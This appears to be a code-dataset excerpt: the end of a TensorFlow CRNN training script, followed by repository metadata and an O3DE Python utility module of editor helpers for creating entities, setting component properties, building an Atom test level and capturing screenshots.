.format(top_num + 1, cur_rec_tk[top_num], cur_pre_tk[top_num], cur_F_tk[top_num]))
if writer:
writer.add_summary(summaries, step)
eval_loss = float(eval_loss / eval_counter)
eval_rec_ts = float(eval_rec_ts / eval_counter)
eval_pre_ts = float(eval_pre_ts / eval_counter)
eval_F_ts = dh.cal_F(eval_rec_ts, eval_pre_ts)
for top_num in range(FLAGS.top_num):
eval_rec_tk[top_num] = float(eval_rec_tk[top_num] / eval_counter)
eval_pre_tk[top_num] = float(eval_pre_tk[top_num] / eval_counter)
eval_F_tk[top_num] = dh.cal_F(eval_rec_tk[top_num], eval_pre_tk[top_num])
return eval_loss, eval_rec_ts, eval_pre_ts, eval_F_ts, eval_rec_tk, eval_pre_tk, eval_F_tk
# Generate batches
batches_train = dh.batch_iter(
list(zip(x_train, y_train)), FLAGS.batch_size, FLAGS.num_epochs)
num_batches_per_epoch = int((len(x_train) - 1) / FLAGS.batch_size) + 1
# Training loop. For each batch...
for batch_train in batches_train:
x_batch_train, y_batch_train = zip(*batch_train)
train_step(x_batch_train, y_batch_train)
current_step = tf.train.global_step(sess, crnn.global_step)
if current_step % FLAGS.evaluate_every == 0:
logger.info("\nEvaluation:")
eval_loss, eval_rec_ts, eval_pre_ts, eval_F_ts, eval_rec_tk, eval_pre_tk, eval_F_tk = \
validation_step(x_validation, y_validation, writer=validation_summary_writer)
logger.info("All Validation set: Loss {0:g}".format(eval_loss))
# Predict by threshold
logger.info("︎☛ Predict by threshold: Recall {0:g}, Precision {1:g}, F {2:g}"
.format(eval_rec_ts, eval_pre_ts, eval_F_ts))
# Predict by topK
logger.info("︎☛ Predict by topK:")
for top_num in range(FLAGS.top_num):
logger.info("Top{0}: Recall {1:g}, Precision {2:g}, F {3:g}"
.format(top_num+1, eval_rec_tk[top_num], eval_pre_tk[top_num], eval_F_tk[top_num]))
if current_step % FLAGS.checkpoint_every == 0:
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
path = saver.save(sess, checkpoint_prefix, global_step=current_step)
logger.info("✔︎ Saved model checkpoint to {0}\n".format(path))
if current_step % num_batches_per_epoch == 0:
current_epoch = current_step // num_batches_per_epoch
logger.info("✔︎ Epoch {0} has finished!".format(current_epoch))
logger.info("✔︎ Done.")
if __name__ == '__main__':
train_crnn()
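# Minimal sketch of the assumed behavior of dh.cal_F used throughout the validation
# code above: a standard F1 score (harmonic mean of recall and precision) with a zero
# guard. The actual implementation lives in the project's data helpers module.
def _assumed_cal_F(recall, precision):
    """Return the F1 score for the given recall and precision."""
    if recall + precision == 0.0:
        return 0.0
    return 2.0 * recall * precision / (recall + precision)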
| 52.654391
| 119
| 0.616237
|
ecac3ada13d33e9f972abda546f10c98cc6ac365
| 32,847
|
py
|
Python
|
Gem/PythonTests/Automated/atom_utils/hydra_editor_utils.py
|
aws-lumberyard-dev/o3de-atomtest
|
d14f88e8649a7de86945906376fcf3e60c81d339
|
[
"Apache-2.0",
"MIT"
] | 2
|
2021-07-18T11:20:41.000Z
|
2022-02-01T20:17:50.000Z
|
Gem/PythonTests/Automated/atom_utils/hydra_editor_utils.py
|
aws-lumberyard-dev/o3de-atomtest
|
d14f88e8649a7de86945906376fcf3e60c81d339
|
[
"Apache-2.0",
"MIT"
] | 5
|
2021-07-14T02:24:07.000Z
|
2021-10-04T21:24:35.000Z
|
Gem/PythonTests/Automated/atom_utils/hydra_editor_utils.py
|
aws-lumberyard-dev/o3de-atomtest
|
d14f88e8649a7de86945906376fcf3e60c81d339
|
[
"Apache-2.0",
"MIT"
] | 7
|
2021-07-06T18:21:14.000Z
|
2021-12-06T09:12:40.000Z
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import collections.abc
import os
from typing import List
from math import isclose
import azlmbr.bus as bus
import azlmbr.editor as editor
import azlmbr.entity as entity
import azlmbr.legacy.general as general
import azlmbr.math as math
import azlmbr.asset as asset
import azlmbr.camera as camera
import azlmbr.object
from azlmbr.entity import EntityType
from Automated.atom_utils.automated_test_utils import TestHelper as helper
from Automated.atom_utils.screenshot_utils import ScreenshotHelper
def find_entity_by_name(entity_name):
"""
Gets an entity ID from the entity with the given entity_name
:param entity_name: String of entity name to search for
:return: entity ID of the first valid match; the empty search result list is returned when no entity matches
"""
search_filter = entity.SearchFilter()
search_filter.names = [entity_name]
matching_entity_list = entity.SearchBus(bus.Broadcast, "SearchEntities", search_filter)
if matching_entity_list:
matching_entity = matching_entity_list[0]
if matching_entity.IsValid():
print(f"{entity_name} entity found with ID {matching_entity.ToString()}")
return matching_entity
else:
return matching_entity_list
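# Hedged usage sketch for find_entity_by_name: the entity name "default_level" is an
# assumption for illustration; an empty list (or None) signals that nothing matched.
def _example_find_entity_by_name():
    entity_id = find_entity_by_name("default_level")
    if entity_id is None or isinstance(entity_id, list):
        print("No valid entity named 'default_level' was found")
    else:
        print(f"Found entity with ID {entity_id.ToString()}")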
def get_component_type_id(component_name, entity_type=entity.EntityType().Game):
"""
Gets the component_type_id from a given component name
:param component_name: String of component name to search for
:param entity_type: Entity type to query (defaults to Game entities)
:return component type ID
"""
type_ids_list = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", [component_name], entity_type)
component_type_id = type_ids_list[0]
return component_type_id
def add_level_component(component_name):
"""
Adds the specified component to the Level Inspector
:param component_name: String of component name to search for
:return Component object.
"""
level_component_list = [component_name]
level_component_type_ids_list = editor.EditorComponentAPIBus(
bus.Broadcast, "FindComponentTypeIdsByEntityType", level_component_list, EntityType().Level
)
level_component_outcome = editor.EditorLevelComponentAPIBus(
bus.Broadcast, "AddComponentsOfType", [level_component_type_ids_list[0]]
)
level_component = level_component_outcome.GetValue()[0]
return level_component
def add_component(componentName, entityId, entity_type=entity.EntityType().Game):
"""
Given a component name, finds component TypeId, adds to given entity, and verifies successful add/active state.
:param componentName: String of component name to add.
:param entityId: Entity to add component to.
:return: Component object.
"""
typeIdsList = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", [componentName], entity_type)
typeNamesList = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeNames", typeIdsList)
componentOutcome = editor.EditorComponentAPIBus(bus.Broadcast, "AddComponentsOfType", entityId, typeIdsList)
isActive = editor.EditorComponentAPIBus(bus.Broadcast, "IsComponentEnabled", componentOutcome.GetValue()[0])
hasComponent = editor.EditorComponentAPIBus(bus.Broadcast, "HasComponentOfType", entityId, typeIdsList[0])
if componentOutcome.IsSuccess() and isActive:
print("{} component was added to entity".format(typeNamesList[0]))
elif componentOutcome.IsSuccess() and not isActive:
print("{} component was added to entity, but the component is disabled".format(typeNamesList[0]))
elif not componentOutcome.IsSuccess():
print("Failed to add {} component to entity".format(typeNamesList[0]))
if hasComponent:
print("Entity has a {} component".format(typeNamesList[0]))
return componentOutcome.GetValue()[0]
def remove_component(component_name, entity_id):
"""
Removes the specified component from the specified entity.
:param component_name: String of component name to remove.
:param entity_id: Entity to remove component from.
:return: EntityComponentIdPair if removal was successful, else None.
"""
type_ids_list = [get_component_type_id(component_name)]
outcome = editor.EditorComponentAPIBus(bus.Broadcast, "GetComponentOfType", entity_id, type_ids_list[0])
if outcome.IsSuccess():
component_entity_pair = outcome.GetValue()
editor.EditorComponentAPIBus(bus.Broadcast, "RemoveComponents", [component_entity_pair])
has_component = editor.EditorComponentAPIBus(bus.Broadcast, "HasComponentOfType", entity_id, type_ids_list[0])
if has_component:
print(f"Failed to remove {component_name}")
return None
else:
print(f"{component_name} was successfully removed")
return component_entity_pair
else:
print(f"{component_name} not found on entity")
return None
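# Hedged usage sketch combining add_component and remove_component. The entity name
# "sphere" and the "Mesh" component are assumptions used purely for illustration.
def _example_add_and_remove_component():
    entity_id = find_entity_by_name("sphere")
    mesh_component = add_component("Mesh", entity_id)
    # ... exercise the component here ...
    removed_pair = remove_component("Mesh", entity_id)
    return mesh_component, removed_pair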
def get_component_property_value(component, component_propertyPath):
"""
Given a component object and a component property path, prints and returns the property's value.
:param component: Component object to act on.
:param component_propertyPath: String of component property. (e.g. 'Settings|Visible')
:return: Value set in given componentPropertyPath
"""
componentPropertyObj = editor.EditorComponentAPIBus(
bus.Broadcast, "GetComponentProperty", component, component_propertyPath
)
if componentPropertyObj.IsSuccess():
componentProperty = componentPropertyObj.GetValue()
print(f"{component_propertyPath} set to {componentProperty}")
return componentProperty
else:
print(f"FAILURE: Could not get value from {component_propertyPath}")
return None
def get_property_tree(component):
"""
Given a configured component object, prints the property tree info from that component
:param component: Component object to act on.
"""
pteObj = editor.EditorComponentAPIBus(bus.Broadcast, "BuildComponentPropertyTreeEditor", component)
pte = pteObj.GetValue()
print(pte.build_paths_list())
return pte
def compare_values(first_object: object, second_object: object, name: str) -> bool:
# Quick case - can we just directly compare the two objects successfully?
if first_object == second_object:
result = True
# No, so get a lot more specific
elif isinstance(first_object, collections.abc.Container):
# If they aren't both containers, they're different
if not isinstance(second_object, collections.abc.Container):
result = False
# If they have different lengths, they're different
elif len(first_object) != len(second_object):
result = False
# If they're different strings, they're containers but they failed the == check so
# we know they're different
elif isinstance(first_object, str):
result = False
else:
# It's a collection of values, so iterate through them all...
collection_idx = 0
result = True
for val1, val2 in zip(first_object, second_object):
result = result and compare_values(val1, val2, f"{name} (index [{collection_idx}])")
collection_idx = collection_idx + 1
else:
# Do approximate comparisons for floats
if isinstance(first_object, float) and isclose(first_object, second_object, rel_tol=0.001):
result = True
# We currently don't have a generic way to compare PythonProxyObject contents, so return a
# false positive result for now.
elif isinstance(first_object, azlmbr.object.PythonProxyObject):
print(f"{name}: validation inconclusive, the two objects cannot be directly compared.")
result = True
else:
result = False
if not result:
print(
f"compare_values failed: {first_object} ({type(first_object)}) vs {second_object} ({type(second_object)})"
)
print(f"{name}: {'SUCCESS' if result else 'FAILURE'}")
return result
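# Self-contained sketch of how compare_values behaves: floats are compared
# approximately, containers are compared element-wise, and differing strings fail.
def _example_compare_values():
    compare_values(1.0, 1.0004, "floats within tolerance")        # logs SUCCESS
    compare_values([1.0, 2.0], [1.0, 2.001], "nested container")  # logs SUCCESS
    compare_values("abc", "abd", "different strings")             # logs FAILURE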
class Entity:
"""
Entity class used to create entity objects
:param name: String for the name of the Entity
:param id: The ID of the entity
"""
def __init__(self, name: str, id: object = entity.EntityId()):
self.name: str = name
self.id: object = id
self.components: List[object] = None
self.parent_id = None
self.parent_name = None
def create_entity(self, entity_position=None, components=None, parent_id=entity.EntityId()):
# Avoid a mutable default argument; None means "no components to add".
components = [] if components is None else components
if entity_position is None:
self.id = editor.ToolsApplicationRequestBus(bus.Broadcast, 'CreateNewEntity', parent_id)
else:
self.id = editor.ToolsApplicationRequestBus(
bus.Broadcast, "CreateNewEntityAtPosition", entity_position, parent_id
)
if self.id.IsValid():
print(f"{self.name} Entity successfully created")
editor.EditorEntityAPIBus(bus.Event, "SetName", self.id, self.name)
self.components = []
for component in components:
self.add_component(component)
def add_component(self, component):
new_component = add_component(component, self.id)
self.components.append(new_component)
def remove_component(self, component):
removed_component = remove_component(component, self.id)
if removed_component is not None:
self.components.remove(removed_component)
def get_parent_info(self):
"""
Sets the value for parent_id and parent_name on the entity (self)
Prints the string for papertrail
:return: None
"""
self.parent_id = editor.EditorEntityInfoRequestBus(bus.Event, "GetParent", self.id)
self.parent_name = editor.EditorEntityInfoRequestBus(bus.Event, "GetName", self.parent_id)
print(f"The parent entity of {self.name} is {self.parent_name}")
def set_test_parent_entity(self, parent_entity_obj):
editor.EditorEntityAPIBus(bus.Event, "SetParent", self.id, parent_entity_obj.id)
self.get_parent_info()
def get_set_test(self, component_index: int, path: str, value: object, expected_result: object = None) -> bool:
"""
Used to set and validate changes in component values
:param component_index: Index location in the self.components list
:param path: asset path in the component
:param value: new value for the variable being changed in the component
:param expected_result: (optional) check the result against a specific expected value
"""
if expected_result is None:
expected_result = value
# Test Get/Set (get old value, set new value, check that new value was set correctly)
print(f"Entity {self.name} Path {path} Component Index {component_index} ")
component = self.components[component_index]
old_value = get_component_property_value(component, path)
if old_value is not None:
print(f"SUCCESS: Retrieved property Value for {self.name}")
else:
print(f"FAILURE: Failed to find value in {self.name} {path}")
return False
if old_value == expected_result:
print(
(
f"WARNING: get_set_test on {self.name} is setting the same value that already exists ({old_value})."
"The set results will be inconclusive."
)
)
editor.EditorComponentAPIBus(bus.Broadcast, "SetComponentProperty", component, path, value)
new_value = get_component_property_value(self.components[component_index], path)
if new_value is not None:
print(f"SUCCESS: Retrieved new property Value for {self.name}")
else:
print(f"FAILURE: Failed to find new value in {self.name}")
return False
return compare_values(new_value, expected_result, f"{self.name} {path}")
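# Hedged usage sketch for the Entity helper class. The component list, property path,
# and spacing value mirror the grid setup used later in create_basic_atom_level and
# are assumptions for illustration only.
def _example_entity_workflow():
    parent = Entity("example_parent")
    parent.create_entity(math.Vector3(0.0, 0.0, 0.0), ["Grid"])
    parent.get_set_test(0, "Controller|Configuration|Secondary Grid Spacing", 1.5)
    child = Entity("example_child")
    child.create_entity(parent_id=parent.id)
    child.set_test_parent_entity(parent)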
def get_set_test(entity: object, component_index: int, path: str, value: object) -> bool:
"""
Used to set and validate changes in component values
:param component_index: Index location in the entity.components list
:param path: asset path in the component
:param value: new value for the variable being changed in the component
"""
return entity.get_set_test(component_index, path, value)
def get_set_property_test(
ly_object: object, attribute_name: str, value: object, expected_result: object = None
) -> bool:
"""
Used to set and validate BehaviorContext property changes in Lumberyard objects
:param ly_object: The lumberyard object to test
:param attribute_name: property (attribute) name in the BehaviorContext
:param value: new value for the variable being changed in the component
:param expected_result: (optional) check the result against a specific expected value other than the one set
"""
if expected_result is None:
expected_result = value
# Test Get/Set (get old value, set new value, check that new value was set correctly)
print(f"Attempting to set {ly_object.typename}.{attribute_name} = {value} (expected result is {expected_result})")
if hasattr(ly_object, attribute_name):
print(f"SUCCESS: Located attribute {attribute_name} for {ly_object.typename}")
else:
print(f"FAILURE: Failed to find attribute {attribute_name} in {ly_object.typename}")
return False
old_value = getattr(ly_object, attribute_name)
if old_value is not None:
print(f"SUCCESS: Retrieved existing value {old_value} for {attribute_name} in {ly_object.typename}")
else:
print(f"FAILURE: Failed to retrieve value for {attribute_name} in {ly_object.typename}")
return False
if old_value == expected_result:
print(
(
f"WARNING: get_set_test on {attribute_name} is setting the same value that already exists ({old_value})."
"The 'set' result for the test will be inconclusive."
)
)
# Set the requested value; expected_result is only used for the comparison below.
setattr(ly_object, attribute_name, value)
new_value = getattr(ly_object, attribute_name)
if new_value is not None:
print(f"SUCCESS: Retrieved new value {new_value} for {attribute_name} in {ly_object.typename}")
else:
print(f"FAILURE: Failed to retrieve value for {attribute_name} in {ly_object.typename}")
return False
return compare_values(new_value, expected_result, f"{ly_object.typename}.{attribute_name}")
def has_components(entity_id: object, component_list: list) -> bool:
"""
Used to verify if a given entity has all the components of components_list. Returns True if all the
components are present, else False
:param entity_id: entity id of the entity
:param component_list: list of component names to be verified
"""
type_ids_list = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", component_list, entity.EntityType().Game)
for type_id in type_ids_list:
if not editor.EditorComponentAPIBus(bus.Broadcast, "HasComponentOfType", entity_id, type_id):
return False
return True
def is_component_enabled(entity_componentid_pair):
return editor.EditorComponentAPIBus(bus.Broadcast, "IsComponentEnabled", entity_componentid_pair)
def set_visibility_state(entity_id, visibility_state):
editor.EditorEntityAPIBus(bus.Event, "SetVisibilityState", entity_id, visibility_state)
def is_entity_hidden(entity_id):
return editor.EditorEntityInfoRequestBus(bus.Event, "IsHidden", entity_id)
def delete_entity(entity_id):
editor.ToolsApplicationRequestBus(bus.Broadcast, "DeleteEntityById", entity_id)
def get_asset_by_path(path):
return asset.AssetCatalogRequestBus(bus.Broadcast, "GetAssetIdByPath", path, math.Uuid(), False)
def delete_all_existing_entities():
search_filter = azlmbr.entity.SearchFilter()
all_entities = entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)
editor.ToolsApplicationRequestBus(bus.Broadcast, "DeleteEntities", all_entities)
def disable_component(component):
editor.EditorComponentAPIBus(bus.Broadcast, "DisableComponents", [component])
# Be this camera
def be_this_camera(camera_entity_id):
camera.EditorCameraViewRequestBus(azlmbr.bus.Event, "ToggleCameraAsActiveView", camera_entity_id)
def set_component_property(component, property_path, property_value):
"""
Given a component returned by 'GetComponentOfType', update its property_path value to property_value
:param component: The component to target in the Editor to set a property for
:param property_path: path to the property to set in the component
:param property_value: the value to set the property to in the property_path
:return: None
"""
editor.EditorComponentAPIBus(azlmbr.bus.Broadcast, 'SetComponentProperty', component, property_path, property_value)
class PathNotFoundError(Exception):
def __init__(self, path):
self.path = path
def __str__(self):
return f'Path "{self.path}" not found in Editor Settings'
def get_editor_settings_path_list():
"""
Get the list of Editor Settings paths
"""
paths = editor.EditorSettingsAPIBus(bus.Broadcast, "BuildSettingsList")
return paths
def get_editor_settings_by_path(path):
"""
Get the value of Editor Settings based on the path.
:param path: path to the Editor Settings to get the value
"""
if path not in get_editor_settings_path_list():
raise PathNotFoundError(path)
outcome = editor.EditorSettingsAPIBus(bus.Broadcast, "GetValue", path)
if outcome.isSuccess():
return outcome.GetValue()
raise RuntimeError(f"GetValue for path '{path}' failed")
def set_editor_settings_by_path(path, value, is_bool=False):
"""
Set the value of Editor Settings based on the path.
# NOTE: Some Editor Settings may need an Editor restart to apply.
# Ex: Enabling or disabling New Viewport Interaction Model
:param path: path to the Editor Settings to get the value
:param value: value to be set
:param is_bool: True for Boolean settings (enable/disable), False for other settings
"""
if path not in get_editor_settings_path_list():
raise PathNotFoundError(path)
if is_bool and not isinstance(value, bool):
def ParseBoolValue(value):
if value == "0":
return False
return True
value = ParseBoolValue(value)
outcome = editor.EditorSettingsAPIBus(bus.Broadcast, "SetValue", path, value)
if not outcome.isSuccess():
raise RuntimeError(f"SetValue for path '{path}' failed")
print(f"Value for path '{path}' is set to {value}")
def get_component_type_id_map(component_name_list):
"""
Given a list of component names, returns a map of component name -> component type id
:param component_name_list: list of component names to look up
:return: Dictionary of component name -> component type id pairs
"""
# Remove any duplicates so we don't have to query for the same TypeId
component_names = list(set(component_name_list))
type_ids_by_component = {}
type_ids = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", component_names, entity.EntityType().Game)
for i, typeId in enumerate(type_ids):
type_ids_by_component[component_names[i]] = typeId
return type_ids_by_component
def helper_create_entity_with_mesh(path_to_mesh, offset=azlmbr.math.Vector3(0.0,0.0,0.0), entity_name='NewEntity'):
# Create a new Entity at the root level
myEntityId = editor.ToolsApplicationRequestBus(azlmbr.bus.Broadcast, 'CreateNewEntity', entity.EntityId())
editor.EditorEntityAPIBus(azlmbr.bus.Event, 'SetName', myEntityId, entity_name)
vec3 = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldTranslation", myEntityId)
vec3.x += offset.x
vec3.y += offset.y
vec3.z += offset.z
azlmbr.components.TransformBus(azlmbr.bus.Event, "SetWorldTranslation", myEntityId, vec3)
# Get Component Types for Atom's Mesh
typeIdsList = [ azlmbr.globals.property.EditorMeshComponentTypeId ]
# add a Mesh component to the entity
componentOutcome = editor.EditorComponentAPIBus(
azlmbr.bus.Broadcast, 'AddComponentsOfType', myEntityId, typeIdsList)
# save a reference to the component
components = componentOutcome.GetValue()
component = components[0]
# an example of checking if the component is there or not
hasComponent = editor.EditorComponentAPIBus(azlmbr.bus.Broadcast, 'HasComponentOfType', myEntityId, typeIdsList[0])
meshId = asset.AssetCatalogRequestBus(bus.Broadcast, 'GetAssetIdByPath', path_to_mesh, math.Uuid(), False)
# set mesh asset
mesh_property_path = 'Controller|Configuration|Mesh Asset'
newObj = editor.EditorComponentAPIBus(
azlmbr.bus.Broadcast, 'SetComponentProperty', component, mesh_property_path, meshId)
if(newObj.IsSuccess()):
print('Mesh asset set')
else:
print('Failed to set mesh asset property')
return myEntityId
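# Hedged usage sketch for helper_create_entity_with_mesh. The model path reuses the
# plane model referenced elsewhere in this module; treat it as an illustrative value.
def _example_create_mesh_entity():
    offset = azlmbr.math.Vector3(0.0, 0.0, 2.0)
    return helper_create_entity_with_mesh(
        os.path.join("Objects", "plane.azmodel"), offset, "ExampleMeshEntity")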
def initial_viewport_setup(screen_width, screen_height):
"""
Initial viewport setup for a test to keep screenshots consistent.
:param screen_width: integer representing the screen resolution width.
:param screen_height: integer representing the screen resolution height.
:return: None
"""
general.set_viewport_size(screen_width, screen_height)
general.update_viewport()
helper.wait_for_condition(
function=lambda: helper.isclose(a=general.get_viewport_size().x, b=screen_width, rel_tol=0.1)
and helper.isclose(a=general.get_viewport_size().y, b=screen_height, rel_tol=0.1),
timeout_in_seconds=4.0
)
result = helper.isclose(a=general.get_viewport_size().x, b=screen_width, rel_tol=0.1) and helper.isclose(
a=general.get_viewport_size().y, b=screen_height, rel_tol=0.1)
general.log(general.get_viewport_size().x)
general.log(general.get_viewport_size().y)
general.log(general.get_viewport_size().z)
general.log(f"Viewport is set to the expected size: {result}")
general.log("Basic level created")
general.run_console("r_DisplayInfo = 0")
def after_level_load():
"""Function to call after creating/opening a level to ensure it loads."""
# Give everything a second to initialize.
general.idle_enable(True)
general.idle_wait(1.0)
general.update_viewport()
general.idle_wait(0.5) # half a second is more than enough for updating the viewport.
# Close out problematic windows, FPS meters, and anti-aliasing.
if general.is_helpers_shown(): # Turn off the helper gizmos if visible
general.toggle_helpers()
general.idle_wait(1.0)
if general.is_pane_visible("Error Report"): # Close Error Report windows that block focus.
general.close_pane("Error Report")
if general.is_pane_visible("Error Log"): # Close Error Log windows that block focus.
general.close_pane("Error Log")
general.idle_wait(1.0)
general.run_console("r_displayInfo=0")
general.run_console("r_antialiasingmode=0")
general.idle_wait(1.0)
return True
def create_basic_atom_level(level_name):
"""
Creates a new level inside the Editor matching level_name & adds the following:
1. "default_level" entity to hold all other entities.
2. Adds Grid, Global Skylight (IBL), ground Mesh, Directional Light, Sphere w/ material+mesh, & Camera components.
3. Each of these components has its settings tweaked slightly to match the ideal scene to test Atom rendering.
:param level_name: name of the level to create and apply this basic setup to.
:return: None
"""
# Create a new level.
new_level_name = level_name
heightmap_resolution = 512
heightmap_meters_per_pixel = 1
terrain_texture_resolution = 412
use_terrain = False
# Return codes are ECreateLevelResult defined in CryEdit.h
return_code = general.create_level_no_prompt(
new_level_name, heightmap_resolution, heightmap_meters_per_pixel, terrain_texture_resolution, use_terrain)
if return_code == 1:
general.log(f"{new_level_name} level already exists")
elif return_code == 2:
general.log("Failed to create directory")
elif return_code == 3:
general.log("Directory length is too long")
elif return_code != 0:
general.log("Unknown error, failed to create level")
else:
general.log(f"{new_level_name} level created successfully")
# Basic setup for newly created level.
after_level_load()
# Create default_level entity
delete_all_existing_entities()
default_level = Entity("default_level")
position = math.Vector3(0.0, 0.0, 0.0)
default_level.create_entity(position, ["Grid"])
default_level.get_set_test(0, "Controller|Configuration|Secondary Grid Spacing", 1.0)
# Set the viewport up correctly after adding the parent default_level entity.
screen_width = 1280
screen_height = 720
degree_radian_factor = 0.0174533 # Used by "Rotation" property for the Transform component.
initial_viewport_setup(screen_width, screen_height)
# Create global_skylight entity and set the properties
global_skylight = Entity("global_skylight")
global_skylight.create_entity(
entity_position=None,
components=["HDRi Skybox", "Global Skylight (IBL)"],
parent_id=default_level.id)
global_skylight_asset_path = os.path.join(
"LightingPresets", "greenwich_park_02_4k_iblskyboxcm_iblspecular.exr.streamingimage")
global_skylight_asset_value = get_asset_by_path(global_skylight_asset_path)
global_skylight.get_set_test(0, "Controller|Configuration|Cubemap Texture", global_skylight_asset_value)
global_skylight.get_set_test(1, "Controller|Configuration|Diffuse Image", global_skylight_asset_value)
global_skylight.get_set_test(1, "Controller|Configuration|Specular Image", global_skylight_asset_value)
# Create ground_plane entity and set the properties
ground_plane = Entity("ground_plane")
ground_plane.create_entity(
entity_position=None,
components=["Material"],
parent_id=default_level.id)
azlmbr.components.TransformBus(azlmbr.bus.Event, "SetLocalUniformScale", ground_plane.id, 32.0)
ground_plane_material_asset_path = os.path.join(
"Materials", "Presets", "PBR", "metal_chrome.azmaterial")
ground_plane_material_asset_value = get_asset_by_path(ground_plane_material_asset_path)
ground_plane.get_set_test(0, "Default Material|Material Asset", ground_plane_material_asset_value)
# Work around to add the correct Atom Mesh component
mesh_type_id = azlmbr.globals.property.EditorMeshComponentTypeId
ground_plane.components.append(
editor.EditorComponentAPIBus(
bus.Broadcast, "AddComponentsOfType", ground_plane.id, [mesh_type_id]
).GetValue()[0]
)
ground_plane_mesh_asset_path = os.path.join("Objects", "plane.azmodel")
ground_plane_mesh_asset_value = get_asset_by_path(ground_plane_mesh_asset_path)
get_set_test(ground_plane, 1, "Controller|Configuration|Mesh Asset", ground_plane_mesh_asset_value)
# Create directional_light entity and set the properties
directional_light = Entity("directional_light")
directional_light.create_entity(
entity_position=math.Vector3(0.0, 0.0, 10.0),
components=["Directional Light"],
parent_id=default_level.id)
directional_light_rotation = math.Vector3(degree_radian_factor * -90.0, 0.0, 0.0)
azlmbr.components.TransformBus(
azlmbr.bus.Event, "SetLocalRotation", directional_light.id, directional_light_rotation)
# Create sphere entity and set the properties
sphere = Entity("sphere")
sphere.create_entity(
entity_position=math.Vector3(0.0, 0.0, 1.0),
components=["Material"],
parent_id=default_level.id)
sphere_material_asset_path = os.path.join("Materials", "Presets", "PBR", "metal_brass_polished.azmaterial")
sphere_material_asset_value = get_asset_by_path(sphere_material_asset_path)
sphere.get_set_test(0, "Default Material|Material Asset", sphere_material_asset_value)
# Work around to add the correct Atom Mesh component
sphere.components.append(
editor.EditorComponentAPIBus(
bus.Broadcast, "AddComponentsOfType", sphere.id, [mesh_type_id]
).GetValue()[0]
)
sphere_mesh_asset_path = os.path.join("Models", "sphere.azmodel")
sphere_mesh_asset_value = get_asset_by_path(sphere_mesh_asset_path)
get_set_test(sphere, 1, "Controller|Configuration|Mesh Asset", sphere_mesh_asset_value)
# Create camera component and set the properties
camera = Entity("camera")
camera.create_entity(
entity_position=math.Vector3(5.5, -12.0, 9.0),
components=["Camera"],
parent_id=default_level.id)
rotation = math.Vector3(
degree_radian_factor * -27.0, degree_radian_factor * -12.0, degree_radian_factor * 25.0
)
azlmbr.components.TransformBus(azlmbr.bus.Event, "SetLocalRotation", camera.id, rotation)
camera.get_set_test(0, "Controller|Configuration|Field of view", 60.0)
be_this_camera(camera.id)
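# Hedged usage sketch: build the basic Atom test level and then reopen it to confirm
# the entities created above are present. The level name is an assumption.
def _example_basic_level_setup():
    create_basic_atom_level("ExampleAtomLevel")
    level_load_save(
        "ExampleAtomLevel",
        ["default_level", "global_skylight", "ground_plane",
         "directional_light", "sphere", "camera"])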
def level_load_save(level_name, entities_to_search):
"""
Opens an existing level matching level_name, verifies the expected entities exist, creates and deletes a temporary entity, and saves the level.
:param level_name: name of the level to load and then save, ex. "Emptylevel"
:param entities_to_search: list of entity names to search for in the level, ex. ["default_level", "sphere"]
:return:
"""
general.open_level_no_prompt(level_name)
helper.wait_for_condition(lambda: level_name in general.get_current_level_name(), 5.0)
# Ensure the level is saved by checking if all the entities are present
search_filter = azlmbr.entity.SearchFilter()
search_filter.names = entities_to_search
result = len(entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)) == len(entities_to_search)
general.log(f"Level is saved successfully: {result}")
# Create new entity
temp_entity = Entity("temp_entity")
temp_entity.create_entity()
search_filter = azlmbr.entity.SearchFilter()
search_filter.names = ["temp_entity"]
result = len(entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)) == 1
general.log(f"New entity created: {result}")
# Delete the new entity
editor.ToolsApplicationRequestBus(bus.Broadcast, "DeleteEntityById", temp_entity.id)
result = len(entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)) == 0
general.log(f"New entity deleted: {result}")
general.save_level()
def verify_required_component_property_value(entity_name, component, property_path, expected_property_value):
"""
Compares the property value of component against the expected_property_value.
:param entity_name: name of the entity to use (for test verification purposes).
:param component: component to check on a given entity for its current property value.
:param property_path: the path to the property inside the component.
:param expected_property_value: The value expected from the value inside property_path.
:return: None, but prints to general.log() which the test uses to verify against.
"""
property_value = editor.EditorComponentAPIBus(
bus.Broadcast, "GetComponentProperty", component, property_path).GetValue()
general.log(f"{entity_name}_test: Property value is {property_value} "
f"which matches {expected_property_value}")
def take_screenshot_game_mode(screenshot_name, entity_name=None):
"""
Enters game mode & takes a screenshot, then exits game mode after.
:param screenshot_name: name to give the captured screenshot .ppm file.
:param entity_name: name of the entity being tested (for generating unique log lines).
:return:
"""
general.enter_game_mode()
helper.wait_for_condition(lambda: general.is_in_game_mode(), 2.0)
general.log(f"{entity_name}_test: Entered game mode: {general.is_in_game_mode()}")
ScreenshotHelper(general.idle_wait_frames).capture_screenshot_blocking(f"{screenshot_name}.ppm")
general.idle_wait(1.0)
general.exit_game_mode()
helper.wait_for_condition(lambda: not general.is_in_game_mode(), 2.0)
general.log(f"{entity_name}_test: Exit game mode: {not general.is_in_game_mode()}")
| 43.50596
| 141
| 0.720857
|
ee7629361ad0396ffd40a08da825ed558afbd26f
| 198
|
py
|
Python
|
Data science/Analise de dados/exercicio python/Exemplo01.py
|
Andrelirao/aulas-graduacao
|
c7e8ebf1ad6b5309720bab9ea0a2472d153cd169
|
[
"MIT"
] | 10
|
2021-04-06T23:45:09.000Z
|
2021-05-26T00:20:28.000Z
|
Data science/Analise de dados/exercicio python/Exemplo01.py
|
Andrelirao/aulas-graduacao
|
c7e8ebf1ad6b5309720bab9ea0a2472d153cd169
|
[
"MIT"
] | 37
|
2021-03-22T12:41:55.000Z
|
2021-06-29T00:42:50.000Z
|
